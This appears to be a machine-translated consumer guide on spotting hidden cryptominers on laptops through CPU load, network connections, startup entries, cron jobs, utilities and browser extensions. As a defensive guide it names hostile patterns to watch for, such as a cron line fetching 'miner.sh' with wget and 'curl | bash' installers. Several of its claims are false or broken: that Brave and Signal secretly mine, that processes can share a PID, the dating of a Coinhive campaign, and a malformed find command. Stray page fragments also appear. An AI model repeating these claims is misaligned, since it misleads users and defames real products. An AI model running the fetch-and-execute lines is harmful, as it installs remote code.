Have you noticed that the laptop starts to slow down for no reason, and the cooler runs at maximum speed even during simple tasks? Your device may be infected hidden miner — malware that uses processor or video card resources to mine cryptocurrency. According to Kaspersky, in 2023 the number of attacks using mining software increased by 43% compared to the previous year. At the same time, 68% of users are not even aware of infection, attributing symptoms to the “age” of the equipment.

In this article you will find 7 proven methodshow to detect a miner on a laptop with Windows 10/11, macOS or Linux - from analyzing CPU load to searching for suspicious processes in startup. We will look at how the built-in tools (Task Manager, Resource Monitor), as well as specialized utilities like Process Explorer or Malwarebytes. And you will also find out what legal programs (for example, browsers or instant messengers) can mine cryptocurrency in the background without your knowledge.

1. Signs of a miner infection: when to sound the alarm

Hidden miners rarely give themselves away with obvious symptoms - their task is to remain undetected for as long as possible. However there is 5 Key Signsthat should alert you:

  • 🔥 Constant overheating even under minimal load (CPU temperature is higher 70°C in idle time).
  • Dramatic reduction in battery life (30-50% compared to normal mode).
  • 🐢 System slowdown when opening new tabs in the browser or launching programs.
  • 🔊 Constant operation of the cooler at high speeds, even when the laptop is “doing nothing.”
  • 📈 Unexplained traffic (if >1 GB of data per day is transferred without your knowledge).

You should be especially wary if symptoms appear after visiting dubious sites, installing pirated software or connecting to public Wi-Fi networks. Mining viruses are often spread through:

  • 📂 Hacked programs (cracks, game repacks, Adobe Photoshop, AutoCAD).
  • 🌐 Fake updates (for example, fake Flash Player or Java).
  • 📧 Phishing emails with malicious attachments (files are especially dangerous .js, .vbs).
⚠️ Attention: Some legal programs (for example, a browser Brave or messenger Signal) can use device resources for mining in the background. This is spelled out in their user agreements, but is often hidden in the fine print.
📊Have you ever encountered mining viruses?
  • Yes, on your device
  • Yes, on a work computer
  • No, but I suspect an infection
  • No and I don't plan to check

2. Check through Task Manager (Windows) or Activity Monitor (macOS)

The fastest way to identify a miner is to analyze the CPU and video card load in real time. On Windows this is done through Task Manager, on macOS - through Activity Monitor.

Instructions for Windows 10/11:

  1. Click Ctrl + Shift + Esc or Ctrl + Alt + Del → Task Manager.
  2. Go to the tab Processes and sort the list by column CPU (descending).
  3. Pay attention to processes that are using CPU on 50%+ for no apparent reason. Particularly suspicious:
    • 🔍 Unknown names (for example, svchost.exe with high load if you don't have active updates).
    • 🔍 Processes with random letters/numbers (a1b2c3.exe).
    • 🔍 Duplicate tasks (for example, two chrome.exe with the same PID).
  • Check the tab Autoload - miners are often registered there to start when the PC is turned on.
  • For macOS (Monterey/Ventura):

    1. Open Programs → Utilities → Activity Monitor.
    2. Go to the tab CPU and sort by % CPU.
    3. Look for processes with names like kernel_task (if loads >200% CPU), WindowServer or unknown .app-files.
    Process Normal load Suspicious load What to do
    svchost.exe 0-10% 30%+ without updates Check via Process Explorer
    chrome.exe 5-20% when working 50%+ in background Close all tabs, check extensions
    lsass.exe 0-5% 15%+ permanently Scan for viruses
    kernel_task (macOS) up to 100% at high load 200%+ when idle Check for overheating and miner

    Sorting processes by CPU load|Searching for unknown names (.exe without description)|Checking the "Startup" tab|Analyzing network activity ("Network" tab)|Searching for duplicate processes-->

    3. Analysis of network activity: how a miner reveals himself

    Mining viruses constantly exchange data with pool servers (for example, NiceHash, MinerGate), so they can be calculated from atypical network traffic. To do this:

    On Windows:

    1. Open Task Manager → Network Activity.
    2. Pay attention to processes that transfer data even when you are not using the Internet.
    3. Use the command in Command line (run as administrator):
      netstat -ano | findstr "ESTABLISHED"

      It will show all active connections. Search IP addresses from blacklists of mining pools (For example, 144.217.67.151 for NiceHash).

    On macOS/Linux:

    1. Open Terminal and enter:
      lsof -i -P | grep -i "established"
    2. Or use nettop -m tcp for real-time traffic monitoring.

    Suspicious signs:

    • 🌍 Connections to IP addresses in Netherlands, Germany or USA (popular locations for mining servers).
    • 🔄 Constant exchange of small packets (50-200 KB/s) even during idle time.
    • 🚫 Port connections 3333, 5555, 7777 (often used by miners).
    Example command to block a suspicious IP

    If you find a suspicious IP (for example, 144.217.67.151), you can temporarily block it through the firewall:

    netsh advfirewall firewall add rule name="Block Miner" dir=out action=block remoteip=144.217.67.151 enable=yes

    4. Check startup and task scheduler

    Miners are often registered in startup or create tasks in Task Scheduler (Windows) to start when the laptop is turned on. How to find them:

    Startup (Windows/macOS):

    • 🪟 Windows: Start → Settings → Applications → Startup.
    • 🍎 macOS: System Preferences → Users and Groups → Login Items.

    Look for programs with unfamiliar names or those that load the system upon startup.

    Task Scheduler (Windows):

    1. Click Win + R, enter taskschd.msc.
    2. Check the folders:
      • Task Scheduler Library → Microsoft → Windows (look for non-standard tasks).
      • Task Scheduler Library (English version).
  • Remove suspicious tasks (especially those that run .bat, .vbs or .ps1 files).
  • Cron (Linux/macOS):

    1. Open Terminal and enter:
      crontab -l
    2. Look for lines with suspicious commands (for example, wget http://.../miner.sh).
    ⚠️ Attention: Some miners disguise themselves as legitimate processes, e.g. Windows Update or Google Software Updater. If you find a task with the name Update*random_symbols* This is a sure sign of infection.

    5. Using specialized utilities to search for miners

    If the built-in tools do not help, use specialized programs, which scan the system for the presence of mining software:

    Program Platform What is looking for Link
    Process Explorer Windows Hidden processes, suspicious DLLs Official website
    Malwarebytes Windows, macOS Miners, Trojans, Spyware malwarebytes.com
    Kaspersky Virus Removal Tool Windows Hidden miners in startup and services kaspersky.ru
    Bitdefender Adware Removal Tool Windows Miners in browsers and extensions bitdefender.ru

    How to use Process Explorer:

    1. Download the utility from the official website Microsoft (it's free).
    2. Run as administrator.
    3. Click Ctrl + D - this will highlight all processes signed Microsoft. The rest should be checked manually.
    4. Right-click on the suspicious process → Properties → Threads. Miners often use high priority threads.

    Malwarebytes Scan:

    1. Install the program and update the database.
    2. Run Full scan (not fast!).
    3. Pay attention to the results in categories PUP (Potentially Unwanted Program) And Trojan.Miner.
    💡

    If the antivirus does not find the miner, but you are sure of infection, try running a scan in Safe Mode (click F8 when Windows boots or use msconfig). Many miners do not activate in this mode, allowing them to be detected.

    6. Checking the browser for a hidden miner

    One of the most common mining methods is through browser extensions or Tabs with malicious JavaScript code. For example, in 2022, hackers hacked more than 4,000 websites and injected a script into them Coinhive, who mined Monero on visitors' computers.

    How to check your browser:

    1. Google Chrome / Yandex Browser / Edge:
      • Go to Settings → Extensions.
      • Remove any suspicious plugins (especially those that promise to “speed up page loading” or “block ads”).
      • Use the built-in Browser Task Manager (Shift + Esc) to find high CPU usage tabs.
    2. Mozilla Firefox:
      • Enter in the address bar about:addons and check the plugins.
      • Use about:performanceto see which tabs are loading the system.
  • General advice: Open Task Manager and see if the browser itself is loading (chrome.exe, firefox.exe) CPU at 30%+ without active actions.
  • List miner extensionsthat should be removed immediately:

    • 🚨 SafeBrowse, AdBlock Pro (fake versions).
    • 🚨 HD for YouTube, Video Downloader.
    • 🚨 SearchManager, Super Optimization.
    💡

    If the CPU load does not drop after closing the browser, the miner is most likely embedded in the system and not working through a tab. In this case, you need to scan the entire laptop with an antivirus.

    7. Checking the file system for suspicious files

    Miners often hide their files in system folders or disguise them as legitimate processes. Where to look:

    Typical locations:

    • 📁 C:\Windows\System32\ (look for files with random names like consent.exe or taskhostw.exe, if they are not system).
    • 📁 C:\Users\<Your_name>\AppData\Roaming\ (popular place for miners).
    • 📁 /Library/Application Support/ (on macOS).
    • 📁 Folders with games or pirated software (for example, C:\Games\GTA V\crack\miner.exe).

    How to find:

    1. On Windows open Explorer, enable display of hidden files (View → Hidden Elements).
    2. Use a search by modification date: miners are updated frequently, so look for files modified in the last 1-2 days.
    3. On macOS/Linux use the command:
      find / -type f -mtime -2 -name "*.sh" -o -name "*.exe" -o -name "*.pl"

      It will find all scripts and executable files created in the last 2 days.

    Suspicious files:

    • 📄 Files without extension or with double (file.txt.exe).
    • 📄 Scripts .bat, .ps1, .vbs in non-standard folders.
    • 📄 Executable files with names like update.exe, service.exe, driver.exe.
    ⚠️ Attention: Do not delete files from System32 or /usr/bin/ no verification! Many miners disguise themselves as system components (for example, lsass.exe can be either a legitimate process or a miner). First check the file via VirusTotal.

    FAQ: Frequently asked questions about miners on laptops

    Can a miner damage a laptop?

    Yes, long-term operation at high temperatures (above 85°C) leads to thermal paste degradation, cooler wear And reduced battery life. In extreme cases it is possible overheating of chips (especially on laptops with weak cooling systems, for example, MacBook Air or Ultrabook).

    How does the miner get to the laptop if I haven’t downloaded anything?

    There are several ways:

    • 🌐 Via browser vulnerabilities (For example, Chrome or Firefox with an outdated version).
    • 📧 Via attachments in letters (even if you did not open the file, some viruses are activated during preview).
    • 🔌 Via infected USB drives (autorun scripts).
    • 📡 Via public Wi-Fi networks (for example, in cafes or airports).

    Is it possible to mine on a laptop legally?

    Technically yes, but this is highly not recommended:

    • 🔋 Laptops are not designed for 24/7 use - this leads to rapid wear.
    • 💰 Profitability of mining on a CPU/integrated video card (Intel UHD, AMD Radeon Vega) is minimal - you will spend more on electricity than you earn.
    • ⚡ Risk of overheating and video card failure (especially on laptops with NVIDIA GTX/RTX or AMD RX).

    What to do if the antivirus does not find the miner, but the laptop slows down?

    Try the following steps:

    1. Run live antivirus (For example, Kaspersky Rescue Disk or Dr.Web LiveUSB) - it scans the system before Windows boots.
    2. Check network connections through Wireshark or TCPView.
    3. Roll back the system to a restore point (if the miner appeared recently).
    4. Reinstalling Windows/macOS (as a last resort).

    Can the miner run on Linux?

    Yes, although less often. Miners for Linux are usually distributed through:

    • 🐧 Fake packages in repositories (for example, sudo apt-get install fake-package).
    • 🐧 Server vulnerabilities (if you are using a laptop as a server).
    • 🐧 Scripts for automatic software installation (For example, curl | bash).

    Check the system via top, htop or nethogs.